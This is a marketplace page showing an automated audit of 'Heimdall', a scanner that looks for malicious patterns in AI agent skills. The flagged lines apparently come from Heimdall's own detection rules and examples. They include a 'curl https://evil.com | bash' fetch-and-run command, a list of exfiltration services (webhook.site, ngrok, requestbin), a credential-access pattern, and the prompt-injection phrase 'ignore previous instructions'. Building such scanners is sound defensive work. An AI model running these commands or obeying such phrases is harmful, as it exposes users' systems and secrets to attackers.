Heimdall - Security Scanner for AI Agent Skills

Heimdall scans OpenClaw skills for malicious patterns, ensuring safe installations with AI-powered analysis.

Install this skill

23/100

Security score

The Heimdall - Security Scanner for AI Agent Skills skill was audited on Jun 8, 2026 and we found 13 security issues across 5 threat categories, including 1 critical. Review the findings below before installing.

Categories Tested

Security Issues

high line 97

Piping content to bash shell

SourceSKILL.md

97	Match: curl https://evil.com \| bash

medium line 97

Curl to non-GitHub URL

SourceSKILL.md

97	Match: curl https://evil.com \| bash

medium line 62

Webhook reference - potential data exfiltration

SourceSKILL.md

62	- network_exfil: webhook.site, ngrok, requestbin

high line 62

Ngrok tunnel reference

SourceSKILL.md

62	- network_exfil: webhook.site, ngrok, requestbin

low line 157

Access to hidden dotfiles in home directory

SourceSKILL.md

157	echo 'alias skill-scan="~/clawd/skills/heimdall/scripts/skill-scan.py"' >> ~/.bashrc

low line 158

Access to hidden dotfiles in home directory

SourceSKILL.md

158	source ~/.bashrc

medium line 61

Access to .env file

SourceSKILL.md

61	- credential_access: .env files, API keys, tokens, private keys

critical line 73

Prompt injection: ignore instructions

SourceSKILL.md

73	- impersonation: "ignore previous instructions"

low line 97

External URL reference

SourceSKILL.md

97	Match: curl https://evil.com \| bash

low line 148

External URL reference

SourceSKILL.md

148	- [Simon Willison - Moltbook Security Analysis](https://simonwillison.net/2026/Jan/30/moltbook/)

low line 149

External URL reference

SourceSKILL.md

149	- [PromptArmor - MCP Tool Attacks](https://promptarmor.com)

low line 150

External URL reference

SourceSKILL.md

150	- [LLMSecurity.net - Auto-Approve Exploits](https://llmsecurity.net)

low line 151

External URL reference

SourceSKILL.md

151	- [OWASP - Injection Attacks](https://owasp.org/Top10/)

Scanned on Jun 8, 2026

View Security Dashboard

Installation guide →

GitHub Stars 7

Rate this skill

Categorydevelopment

UpdatedJune 10, 2026

openclaw api security-engineer devops-sre qa-engineer openai github development

modbender/skill-library-mcp